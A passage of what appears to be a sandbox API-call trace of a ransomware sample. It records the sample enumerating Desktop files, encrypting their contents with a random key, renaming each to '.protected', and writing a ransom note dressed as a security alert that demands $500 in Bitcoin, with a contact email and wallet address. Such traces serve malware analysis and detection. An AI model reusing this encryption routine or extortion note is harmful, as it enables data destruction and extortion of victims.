(lpFirst="zXg_b.png", lpSrch=".protected") returned 0x0 [0091.234] lstrcmpW (lpString1="zXg_b.png", lpString2="RESTORE_FILES.txt") returned 1 [0091.234] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295eebc | out: pbBuffer=0x295eebc) returned 1 [0091.234] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295eee4*=0x30) returned 1 [0091.234] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\zxg_b.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xd4 [0091.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.234] StrStrW (lpFirst="zXg_b.png", lpSrch=".txt") returned 0x0 [0091.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.234] StrStrW (lpFirst="zXg_b.png", lpSrch=".rar") returned 0x0 [0091.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png") returned 59 [0091.235] StrStrW (lpFirst="zXg_b.png", lpSrch=".zip") returned 0x0 [0091.235] ReadFile (in: hFile=0xd4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.235] SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.235] WriteFile (in: hFile=0xd4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295ef04*=0x2800, lpOverlapped=0x0) returned 1 [0091.236] 
SetFilePointerEx (in: hFile=0xd4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.236] WriteFile (in: hFile=0xd4, lpBuffer=0x295eedc*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x295eedc*, lpNumberOfBytesWritten=0x295ef04*=0x4, lpOverlapped=0x0) returned 1 [0091.236] WriteFile (in: hFile=0xd4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295ef04*=0x30, lpOverlapped=0x0) returned 1 [0091.236] CloseHandle (hObject=0xd4) returned 1 [0091.237] wnsprintfW (in: pszDest=0x4bfb20, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png.protected") returned 69 [0091.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\zxg_b.png"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\zXg_b.png.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\zxg_b.png.protected")) returned 1 [0091.238] FindNextFileW (in: hFindFile=0x47b9d0, lpFindFileData=0x295ef20 | out: lpFindFileData=0x295ef20) returned 0 [0091.238] FindClose (in: hFindFile=0x47b9d0 | out: hFindFile=0x47b9d0) returned 1 [0091.238] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\RESTORE_FILES.txt") returned 67 [0091.238] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\7YQ_vFv\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\7yq_vfv\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.238] lstrlenA (lpString="! 
SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0091.238] WriteFile (in: hFile=0xb4, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295ef04*=0x53d, lpOverlapped=0x0) returned 1 [0091.239] lstrlenA (lpString="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") returned 684 [0091.239] WriteFile (in: hFile=0xb4, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295ef04*=0x2ac, lpOverlapped=0x0) returned 1 [0091.239] 
lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0091.239] WriteFile (in: hFile=0xb4, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295ef04, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295ef04*=0xb1, lpOverlapped=0x0) returned 1 [0091.239] CloseHandle (hObject=0xb4) returned 1 [0091.240] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="Windows") returned -1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="Program Files") returned -1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="Program Files (x86)") returned -1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="$Recycle.bin") returned 1 [0091.240] lstrcmpiW (lpString1="9-17bDytB l.mp3", lpString2="System Volume Information") returned -1 [0091.240] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.240] StrStrIW (lpFirst="9-17bDytB l.mp3", lpSrch=".protected") returned 0x0 [0091.240] lstrcmpW (lpString1="9-17bDytB l.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.240] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.240] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.241] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-17bdytb l.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, 
dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.241] StrStrW (lpFirst="9-17bDytB l.mp3", lpSrch=".txt") returned 0x0 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.241] StrStrW (lpFirst="9-17bDytB l.mp3", lpSrch=".rar") returned 0x0 [0091.241] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3") returned 57 [0091.241] StrStrW (lpFirst="9-17bDytB l.mp3", lpSrch=".zip") returned 0x0 [0091.241] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.242] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.242] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.242] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.242] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.242] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.242] CloseHandle (hObject=0xb4) returned 1 [0091.243] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, 
pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3.protected") returned 67 [0091.243] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-17bdytb l.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\9-17bDytB l.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\9-17bdytb l.mp3.protected")) returned 1 [0091.244] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.244] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="Windows") returned -1 [0091.244] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="Program Files") returned -1 [0091.244] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="Program Files (x86)") returned -1 [0091.245] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="$Recycle.bin") returned 1 [0091.245] lstrcmpiW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="System Volume Information") returned -1 [0091.245] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrIW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".protected") returned 0x0 [0091.245] lstrcmpW (lpString1="bY2I98UZEgtfX uPDzh.csv", lpString2="RESTORE_FILES.txt") returned -1 [0091.245] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.245] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.245] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by2i98uzegtfx updzh.csv"), 
dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".txt") returned 0x0 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".rar") returned 0x0 [0091.245] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv") returned 65 [0091.245] StrStrW (lpFirst="bY2I98UZEgtfX uPDzh.csv", lpSrch=".zip") returned 0x0 [0091.245] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.246] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.246] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.246] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.246] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.246] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) 
returned 1 [0091.246] CloseHandle (hObject=0xb4) returned 1 [0091.247] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv.protected") returned 75 [0091.247] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by2i98uzegtfx updzh.csv"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bY2I98UZEgtfX uPDzh.csv.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\by2i98uzegtfx updzh.csv.protected")) returned 1 [0091.248] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="Windows") returned -1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="Program Files") returned -1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="Program Files (x86)") returned -1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="$Recycle.bin") returned 1 [0091.248] lstrcmpiW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="System Volume Information") returned -1 [0091.248] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.248] StrStrIW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".protected") returned 0x0 [0091.248] lstrcmpW (lpString1="bysT_gv2vLx7hp5rloyi.mp3", lpString2="RESTORE_FILES.txt") returned -1 [0091.248] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.248] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.248] CreateFileW 
(lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byst_gv2vlx7hp5rloyi.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.249] StrStrW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".txt") returned 0x0 [0091.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.249] StrStrW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".rar") returned 0x0 [0091.249] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3") returned 66 [0091.249] StrStrW (lpFirst="bysT_gv2vLx7hp5rloyi.mp3", lpSrch=".zip") returned 0x0 [0091.249] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.249] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.249] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.250] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.250] WriteFile (in: hFile=0xb4, 
lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.250] CloseHandle (hObject=0xb4) returned 1 [0091.250] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3.protected") returned 76 [0091.250] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byst_gv2vlx7hp5rloyi.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\bysT_gv2vLx7hp5rloyi.mp3.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\byst_gv2vlx7hp5rloyi.mp3.protected")) returned 1 [0091.251] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="Windows") returned -1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="Program Files") returned -1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="Program Files (x86)") returned -1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="$Recycle.bin") returned 1 [0091.251] lstrcmpiW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="System Volume Information") returned -1 [0091.251] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.251] StrStrIW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".protected") returned 0x0 [0091.251] lstrcmpW (lpString1="CPU9r_M2xeJXGI.pptx", lpString2="RESTORE_FILES.txt") returned -1 [0091.251] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: pbBuffer=0x295f12c) returned 1 [0091.251] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, 
pbData=0x48ea38*, pdwDataLen=0x295f154*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295f154*=0x30) returned 1 [0091.251] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpu9r_m2xejxgi.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xb4 [0091.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.252] StrStrW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".txt") returned 0x0 [0091.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.252] StrStrW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".rar") returned 0x0 [0091.252] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx") returned 61 [0091.252] StrStrW (lpFirst="CPU9r_M2xeJXGI.pptx", lpSrch=".zip") returned 0x0 [0091.252] ReadFile (in: hFile=0xb4, lpBuffer=0x4a1458, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesRead=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.253] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0xffffd800, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0091.253] WriteFile (in: hFile=0xb4, lpBuffer=0x4a1458*, nNumberOfBytesToWrite=0x2800, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x4a1458*, lpNumberOfBytesWritten=0x295f174*=0x2800, lpOverlapped=0x0) returned 1 [0091.253] SetFilePointerEx (in: hFile=0xb4, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0091.253] WriteFile (in: hFile=0xb4, lpBuffer=0x295f14c*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x295f14c*, 
lpNumberOfBytesWritten=0x295f174*=0x4, lpOverlapped=0x0) returned 1 [0091.253] WriteFile (in: hFile=0xb4, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295f174, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295f174*=0x30, lpOverlapped=0x0) returned 1 [0091.253] CloseHandle (hObject=0xb4) returned 1 [0091.253] wnsprintfW (in: pszDest=0x4695e0, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx.protected") returned 71 [0091.253] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpu9r_m2xejxgi.pptx"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\CPU9r_M2xeJXGI.pptx.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\desktop\\cpu9r_m2xejxgi.pptx.protected")) returned 1 [0091.254] FindNextFileW (in: hFindFile=0x47b990, lpFindFileData=0x295f190 | out: lpFindFileData=0x295f190) returned 1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="Windows") returned -1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="Program Files") returned -1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="Program Files (x86)") returned -1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="$Recycle.bin") returned 1 [0091.254] lstrcmpiW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="System Volume Information") returned -1 [0091.254] wnsprintfW (in: pszDest=0x47e9d8, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Desktop\\d81mceAyH3Zi _M-J-W.doc") returned 65 [0091.255] StrStrIW (lpFirst="d81mceAyH3Zi _M-J-W.doc", lpSrch=".protected") returned 0x0 [0091.255] lstrcmpW (lpString1="d81mceAyH3Zi _M-J-W.doc", lpString2="RESTORE_FILES.txt") returned -1 [0091.255] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295f12c | out: 
